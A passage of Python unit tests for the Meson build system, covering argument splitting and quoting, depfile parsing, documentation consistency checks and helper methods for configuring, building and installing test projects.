(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
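# quote_arg must produce a string that the platform's argument splitter
# parses back into the original argument; the loop below verifies this by
# round-tripping through split_args.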
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
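# DepFile parses Makefile-style dependency rules; get_all_dependencies()
# returns the transitive set of prerequisites for a target, so line
# continuations, escaping and cycles must all be handled gracefully.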
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
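# sort_libpaths reorders library directories so that those corresponding to
# the given pkg-config search paths come first, in pkg-config path order,
# as the assertions below expect.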
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.List[T.Tuple[Path, Exception]]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
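# Return the markdown text between the heading matched as `name` and the
# next heading in the `sections` iterator (or the end of the document).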
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that the `buildtype` table inside `Core options` matches how
# setting the builtin options actually behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path, otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs, CI will just abort. It is very hard to distinguish
# between a CI issue and a test bug in that case. Set a timeout and fail
# loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# use them to replace the command of every compile command in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
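# Recover the Meson target name from a built filename by stripping the
# extension and any 'lib'/'cyg' prefix.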
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
